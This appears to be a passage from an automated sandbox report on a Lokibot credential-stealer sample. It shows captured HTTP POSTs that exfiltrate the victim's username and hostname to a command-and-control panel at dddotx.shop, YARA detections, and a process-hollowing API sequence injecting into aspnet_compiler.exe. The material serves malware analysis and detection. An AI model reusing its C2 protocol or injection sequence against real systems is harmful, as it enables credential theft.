                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrIaHGUajYRIJBQ2y70HstN%2FXK%2FIN%2B%2BQGicIrj0G4bEVdjzgi1KHWwJ%2Fk%2Fa8B5BmsOJ956q8lqClQd9U17Y3aQYhB5fpjK7CukqeTBsooVtO73aGrLWdg0pfu9s%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ec56fad7c84-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination Port
                  130192.168.2.456006188.114.96.380
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:41.407851934 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:41.413983107 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:42.063430071 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BzWaR9gQE3MUuopuuXliGTqRJyCSnKgjIvsS80CdUvWqGRVmKjEisT8jh4Ea75KWLDpxxcPgkzdU8P7zGk1%2BkIc3V6zA94X75L0DqL%2B0RYmqTHsK7TKXrFFQcyEGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ecb5df14386-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:09:28:34
                  Start date:25/09/2024
                  Path:C:\Users\user\Desktop\1e#U0414.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\1e#U0414.exe"
                  Imagebase:0xfd0000
                  File size:168'448 bytes
                  MD5 hash:ED9FE2C20A68172921C064D0D9886B7B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:09:28:34
                  Start date:25/09/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Imagebase:0x250000
                  File size:56'368 bytes
                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:2
                  Start time:09:28:34
                  Start date:25/09/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Imagebase:0x9c0000
                  File size:56'368 bytes
                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:24.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:17
                    Total number of Limit Nodes:2
                    execution_graph 3617 3226be0 3618 3226c53 Wow64SetThreadContext 3617->3618 3619 3226c3e 3617->3619 3620 3226c9c 3618->3620 3619->3618 3627 3226f10 3628 3226f79 3627->3628 3629 3226f8e WriteProcessMemory 3627->3629 3628->3629 3630 3226ff0 3629->3630 3631 3226cf0 ReadProcessMemory 3632 3226daf 3631->3632 3633 3227050 ResumeThread 3634 32270d8 3633->3634 3621 32268a8 3622 32268c7 CreateProcessW 3621->3622 3624 3226a9c 3622->3624 3624->3624 3625 3226e08 VirtualAllocEx 3626 3226ebf 3625->3626
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID: poq
                    • API String ID: 0-1570044193
                    • Opcode ID: 00d2513e7b8060e3434bb6b3aa54349a4fc3b7e861b0c23460217837bba71bb1
                    • Instruction ID: fa3cbf5b2664d610603a94c6bebb81f0d3798ddaf062ceb8f0b56a4db28fc898
                    • Opcode Fuzzy Hash: 00d2513e7b8060e3434bb6b3aa54349a4fc3b7e861b0c23460217837bba71bb1
                    • Instruction Fuzzy Hash: D432C175A00228DFDB25CF69C944F99BBB2FF49300F1580E9E509AB265DB31AE91CF50
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID: XXkq
                    • API String ID: 0-3965285535
                    • Opcode ID: 44c3783806403c6511ae0d46b129ca9b7355f5348c639fdcb1db8c1a8ccfa8e3
                    • Instruction ID: 5569e8bbee8907338578495c8510919d8d5de2e5411f289ecc534736a3c436db
                    • Opcode Fuzzy Hash: 44c3783806403c6511ae0d46b129ca9b7355f5348c639fdcb1db8c1a8ccfa8e3
                    • Instruction Fuzzy Hash: 5132B374E00229DFEB64CF69DD44B9DBBB2BB88300F1491AAE909A7354DB345E91CF50
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 48bf6293d6240fc41c3f92d79b711da124b5ca971a8791cc7d9a096a49c8ffc8
                    • Instruction ID: 40edc02053b55501d58bb365ece1dd900cfd97be242bfddea309346c2007de70
                    • Opcode Fuzzy Hash: 48bf6293d6240fc41c3f92d79b711da124b5ca971a8791cc7d9a096a49c8ffc8
                    • Instruction Fuzzy Hash: A1713971E156298BDB68CF2ACD457DAFBF2AF89300F14C0EA810DA7254EB705E958F40
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f550d0d21ca4151257ebb57d14b620e7585d89ce9ce4473687819cebb2a19e63
                    • Instruction ID: 3fe8ad66acfbb332e134aa8a784a6cbc76c39a9d27eec1a1ccef4ab47a0da073
                    • Opcode Fuzzy Hash: f550d0d21ca4151257ebb57d14b620e7585d89ce9ce4473687819cebb2a19e63
                    • Instruction Fuzzy Hash: C651D875E152299FDB24CF6AD940BDEBBF2BF89300F14C1AAD508AB264D7305A85CF50
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c5ee686963fbf65553bcf4b63e74e4126ce574bed307fe5b1a9b5e23ed39e4dc
                    • Instruction ID: 09686b7fb2572711c811d4effea521bdf78385b0b93355fef9e67318aaad3ef7
                    • Opcode Fuzzy Hash: c5ee686963fbf65553bcf4b63e74e4126ce574bed307fe5b1a9b5e23ed39e4dc
                    • Instruction Fuzzy Hash: 1D511A74E156298BCB68CF25CE456D9FBF2AF89300F2085EA810DA7264DB705F918F40
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d0d49aa2dc35578b91b70fbf0edb7cb2e58d661f8f6842510b8b0d13e2f7416
                    • Instruction ID: 5d4749d79d9b46ff769348557cf18845683decd02d5169a1e6bd1261aa7e9fb3
                    • Opcode Fuzzy Hash: 8d0d49aa2dc35578b91b70fbf0edb7cb2e58d661f8f6842510b8b0d13e2f7416
                    • Instruction Fuzzy Hash: F5413B74E156298BCB68CF25CD856C9FBF2EF89300F2085EA810DA7254DB709ED18F40

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 38 32267a7-3226864 40 32268c3-3226933 38->40 41 3226866-3226872 38->41 42 3226935-3226947 40->42 43 322694a-3226958 40->43 41->40 42->43 44 322695a-322696c 43->44 45 322696f-32269ab 43->45 44->45 46 32269bf-3226a9a CreateProcessW 45->46 47 32269ad-32269bc 45->47 51 3226aa3-3226b6c 46->51 52 3226a9c-3226aa2 46->52 47->46 61 3226ba2-3226bad 51->61 62 3226b6e-3226b97 51->62 52->51 66 3226bae 61->66 62->61 66->66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID: NH>
                    • API String ID: 0-2295643262
                    • Opcode ID: 5879c1be0a748535db1a036ed93b1caec76b2f0ce241eea9bf9125716c87478c
                    • Instruction ID: 581ce25faa83d75c96a38bf05f10629fe5b5124fefe236cef69a5409cc73a947
                    • Opcode Fuzzy Hash: 5879c1be0a748535db1a036ed93b1caec76b2f0ce241eea9bf9125716c87478c
                    • Instruction Fuzzy Hash: 04A11571C042699FCB25CF68C881BEDBBB1EF0A300F0485DAD588B7211D774AA85CF95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 67 322689e-32268a1 68 32268a3-32268c2 67->68 69 32268c7-3226933 67->69 68->69 70 3226935-3226947 69->70 71 322694a-3226958 69->71 70->71 72 322695a-322696c 71->72 73 322696f-32269ab 71->73 72->73 74 32269bf-3226a9a CreateProcessW 73->74 75 32269ad-32269bc 73->75 79 3226aa3-3226b6c 74->79 80 3226a9c-3226aa2 74->80 75->74 89 3226ba2-3226bad 79->89 90 3226b6e-3226b97 79->90 80->79 94 3226bae 89->94 90->89 94->94
                    APIs
                    • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03226A87
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: NH>
                    • API String ID: 963392458-2295643262
                    • Opcode ID: edd0c3637d0191eed72d0d7321af9b06cedf4c3aaa981fddc1057ee4fb1970ff
                    • Instruction ID: 3eed19fe2d2058f602624d8d040377ea2fdf66cac292f1151c209472e459ecb2
                    • Opcode Fuzzy Hash: edd0c3637d0191eed72d0d7321af9b06cedf4c3aaa981fddc1057ee4fb1970ff
                    • Instruction Fuzzy Hash: 5681B0B5D0022D9FDF24CF69D940BEDBBF5AB19304F0490AAE548B7220DB749A85CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 95 32268a8-3226933 97 3226935-3226947 95->97 98 322694a-3226958 95->98 97->98 99 322695a-322696c 98->99 100 322696f-32269ab 98->100 99->100 101 32269bf-3226a9a CreateProcessW 100->101 102 32269ad-32269bc 100->102 106 3226aa3-3226b6c 101->106 107 3226a9c-3226aa2 101->107 102->101 116 3226ba2-3226bad 106->116 117 3226b6e-3226b97 106->117 107->106 121 3226bae 116->121 117->116 121->121
                    APIs
                    • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03226A87
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: NH>
                    • API String ID: 963392458-2295643262
                    • Opcode ID: 92a229fccc8e15ec6feaafcc57043d87d8fc3a30c7d3c24d9170800dff3beb4b
                    • Instruction ID: 7f1d3e1a0b11bbf710d18128bb36975982cb0038fa4f8946c63452d7c6a7b941
                    • Opcode Fuzzy Hash: 92a229fccc8e15ec6feaafcc57043d87d8fc3a30c7d3c24d9170800dff3beb4b
                    • Instruction Fuzzy Hash: 4181B075D0022D9FDB24CFA9C940BDDBBF5AB09304F0490EAE548B7220DB749A85CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 122 3226ce8-3226ce9 123 3226ceb-3226d0e 122->123 124 3226d0f-3226dad ReadProcessMemory 122->124 123->124 126 3226db6-3226df4 124->126 127 3226daf-3226db5 124->127 127->126
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID: NH>
                    • API String ID: 1726664587-2295643262
                    • Opcode ID: e34009cfdc28710b35fadc6b2e6173f6dcfa87c39b9264b9de295225fc8bc20b
                    • Instruction ID: 92ebd7e4f4ad6d9dbfc03192fa41089f0557cc1f5bdab310fd06d3768e86638e
                    • Opcode Fuzzy Hash: e34009cfdc28710b35fadc6b2e6173f6dcfa87c39b9264b9de295225fc8bc20b
                    • Instruction Fuzzy Hash: 3641BCB9D04258DFCF10CFA9D884ADEFBB1BB1A310F14916AE824BB250C375A945CF65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 130 3226f08-3226f77 131 3226f79-3226f8b 130->131 132 3226f8e-3226fee WriteProcessMemory 130->132 131->132 133 3226ff0-3226ff6 132->133 134 3226ff7-3227035 132->134 133->134
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226FDE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID: NH>
                    • API String ID: 3559483778-2295643262
                    • Opcode ID: eb84b26b12e59bf3289b84db15db8d9542ab99c9387af04ff769c65dc351d193
                    • Instruction ID: a9f0fd668970bb912e7dd32dfafcf999b564ef44631e660a082c9e287f620466
                    • Opcode Fuzzy Hash: eb84b26b12e59bf3289b84db15db8d9542ab99c9387af04ff769c65dc351d193
                    • Instruction Fuzzy Hash: 7D4178B5D042589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7250D375AA45CF64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 137 3226f10-3226f77 138 3226f79-3226f8b 137->138 139 3226f8e-3226fee WriteProcessMemory 137->139 138->139 140 3226ff0-3226ff6 139->140 141 3226ff7-3227035 139->141 140->141
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226FDE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID: NH>
                    • API String ID: 3559483778-2295643262
                    • Opcode ID: 3371b2de52868d1da3c95d88f187e2f3296780ff6137f92db645d702401577f3
                    • Instruction ID: 610922016155bc287dbca7853b8063b41ec14708346dfe308df9a32ae5ded3ef
                    • Opcode Fuzzy Hash: 3371b2de52868d1da3c95d88f187e2f3296780ff6137f92db645d702401577f3
                    • Instruction Fuzzy Hash: 104168B9D042589FCF10CFA9D984ADEFBF1BB09314F24902AE818B7250D375AA45CF64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 144 3226cf0-3226dad ReadProcessMemory 145 3226db6-3226df4 144->145 146 3226daf-3226db5 144->146 146->145
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03226D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID: NH>
                    • API String ID: 1726664587-2295643262
                    • Opcode ID: 08fa89fc2e744b3e862041f2eb31e0b5ed99c7ac91de45f4d83a8a165954e7bd
                    • Instruction ID: a579998ecf7746fa8d07a8cb5c6c1f484b266343c2be6c0315c13bbdc157eba8
                    • Opcode Fuzzy Hash: 08fa89fc2e744b3e862041f2eb31e0b5ed99c7ac91de45f4d83a8a165954e7bd
                    • Instruction Fuzzy Hash: B73187B9D04268DFCF10CFAAD984ADEFBB1BB09310F10A02AE814B7210D375A945CF64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 149 3226bd8-3226bd9 150 3226bdb-3226bfb 149->150 151 3226bff-3226c3c 149->151 150->151 153 3226c53-3226c9a Wow64SetThreadContext 151->153 154 3226c3e-3226c50 151->154 155 3226ca3-3226cdb 153->155 156 3226c9c-3226ca2 153->156 154->153 156->155
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 03226C8A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID: NH>
                    • API String ID: 983334009-2295643262
                    • Opcode ID: f1a6686a7dc233447befb473b7ee50c4441c730a82a64c0d247d8eac45d4864f
                    • Instruction ID: f91823e011327a33ae3206b57d88280443ece9b26fe9bfa7fcf0734f152ee8a1
                    • Opcode Fuzzy Hash: f1a6686a7dc233447befb473b7ee50c4441c730a82a64c0d247d8eac45d4864f
                    • Instruction Fuzzy Hash: 6441EBB5D112589FCB10CFA9D884ADDFBF1FB09314F14802AE418B7250D3789985CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 159 3226e00-3226ebd VirtualAllocEx 160 3226ec6-3226efc 159->160 161 3226ebf-3226ec5 159->161 161->160
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03226EAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: NH>
                    • API String ID: 4275171209-2295643262
                    • Opcode ID: a0b30f20d03bdbe4fff0103119597e912bfea4e17d1ac3f761725b30b1f84e73
                    • Instruction ID: 57406c50646ff8e86e66992554881e98dd71097fa3a6db77ae92bad3c25681bb
                    • Opcode Fuzzy Hash: a0b30f20d03bdbe4fff0103119597e912bfea4e17d1ac3f761725b30b1f84e73
                    • Instruction Fuzzy Hash: 863167B9D04258DFCF10CFA9E984A9EFBB1AB59310F14901AE818B7310D375A945CF65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 3226e08-3226ebd VirtualAllocEx 165 3226ec6-3226efc 164->165 166 3226ebf-3226ec5 164->166 166->165
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03226EAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: NH>
                    • API String ID: 4275171209-2295643262
                    • Opcode ID: e4cace24b18b0c6b5306940b1b60255f3a2e9c0e67099015ec76678b49083a01
                    • Instruction ID: 129c33b6ee7ce9a169c2ed3c93e11015e8c9f5cfe5d725ebae1b27fbdace6bd2
                    • Opcode Fuzzy Hash: e4cace24b18b0c6b5306940b1b60255f3a2e9c0e67099015ec76678b49083a01
                    • Instruction Fuzzy Hash: E83154B9D04258EFCF10CFA9E984A9EFBB5BB19310F10A02AE814B7310D375A945CF65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 169 3226be0-3226c3c 170 3226c53-3226c9a Wow64SetThreadContext 169->170 171 3226c3e-3226c50 169->171 172 3226ca3-3226cdb 170->172 173 3226c9c-3226ca2 170->173 171->170 173->172
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 03226C8A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID: NH>
                    • API String ID: 983334009-2295643262
                    • Opcode ID: f2521a45c166eb18cdd4a42587396beb21a31fbf39c385154eb557549b2c57a4
                    • Instruction ID: 2de762988bc171de7aa69b0cbaa0189fe6bd795214adabb4b762eb47a49ce34b
                    • Opcode Fuzzy Hash: f2521a45c166eb18cdd4a42587396beb21a31fbf39c385154eb557549b2c57a4
                    • Instruction Fuzzy Hash: 78317AB5D012589FCB10CFAAD984ADEFBF1FB49314F24902AE418B7250D379A985CF64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 176 3227048-32270d6 ResumeThread 177 32270d8-32270de 176->177 178 32270df-322710d 176->178 177->178
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 032270C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID: NH>
                    • API String ID: 947044025-2295643262
                    • Opcode ID: 4efaed082e49636cdeb07ef94d0683bacc23845bc969f0944f8f4ac89256f973
                    • Instruction ID: b79d5ef96220efeafe24ef91030be2aefb07a3c0c3d7535838f0578feac73196
                    • Opcode Fuzzy Hash: 4efaed082e49636cdeb07ef94d0683bacc23845bc969f0944f8f4ac89256f973
                    • Instruction Fuzzy Hash: 9621A8B8D04258DFCB10CFA9D984ADEFBF0AB49310F24905AE818B7310D335A945CFA9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 181 3227050-32270d6 ResumeThread 182 32270d8-32270de 181->182 183 32270df-322710d 181->183 182->183
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 032270C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID: NH>
                    • API String ID: 947044025-2295643262
                    • Opcode ID: ece6be089ef3deb639c76ad3360dca9c398a4c6c94327dd6046a7097b476dda5
                    • Instruction ID: 539e8512ac6058ca2922af76a16a880ca0e697d314b9931051d0c0c97f537805
                    • Opcode Fuzzy Hash: ece6be089ef3deb639c76ad3360dca9c398a4c6c94327dd6046a7097b476dda5
                    • Instruction Fuzzy Hash: 542199B8D042589FCB10CFA9D984ADEFBF4EB09320F14905AE818B7310D375A945CFA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
